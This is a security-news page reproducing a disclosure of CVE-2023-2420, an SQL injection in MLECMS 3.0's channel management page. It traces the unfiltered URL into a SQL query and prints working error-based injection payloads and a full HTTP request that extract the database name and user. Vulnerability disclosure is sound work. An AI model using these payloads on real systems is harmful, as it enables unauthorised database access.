Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-2420: elecms/README.md at main · VG00000/elecms

A vulnerability was found in MLECMS 3.0. It has been rated as critical. This issue affects the function get_url in the library /upload/inc/lib/admin of the file upload\inc\include\common.func.php. The manipulation of the argument $_SERVER[‘REQUEST_URI’] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227717 was assigned to this vulnerability.

CVE
#sql#xss#vulnerability#web#windows#apple#php#nginx#chrome#webkit

Source code download address: http://www.mlecms.com/download/zip/mlecms-3.0.zip Operating environment:Nginx+mysql

A vulnerability exists in the "get_url()" function in lines 40-53 of the “upload\inc\include\common.func.php” file,This function directly obtains the URL from “$_SERVER” and returns it without filtering, which may lead to SQL injection or XSS vulnerabilities

Global search for "get_url", where “get_url” exists in “/upload/inc/lib/admin.lib.php” and is directly spliced into SQL statements

Open this file, line 49. The risky SQL statement is located in the "logs ()" method

Continue to track the “logs” method, which is used on lines 13 and 16 of the " \upload\admin\channel_manage.php" file

Analyze the routing, combine the file name characteristics, and locate the function point at “网站频道管理”

Analyze" channel_manage. php “, and only execute” admin:: logs “when” $_GET ['del '] “is a number and” $ass [‘id’] “is empty.”

After analyzing and testing “$db ->query” to construct a request package, it is known that the deleted channel ID is greater than the actual channel ID, which can make “$ass ['id ']" null. Because” $_GET [‘del '] "must be a number, and the vulnerability point is located in the URL, requiring the insertion of characters. Therefore, combined with SQL statements, the following error injection method can be used to query the database name: channel_manage.php?del=1111#’or updatexml(1,concat(0x7e,database()),0) or’

Query user

The test environment is Nginx+MySQL. If other middleware is used, it may be necessary to reconstruct the payload data packet: GET /admin/channel_manage.php?del=1111#’or updatexml(1,concat(0x7e,user()),0) or’ HTTP/1.1 Host: 192.168.31.128:90 accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=1ohoqsk1aaiaj81sr1ngt5phm0; mlecms_global_language=1 Connection: close

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907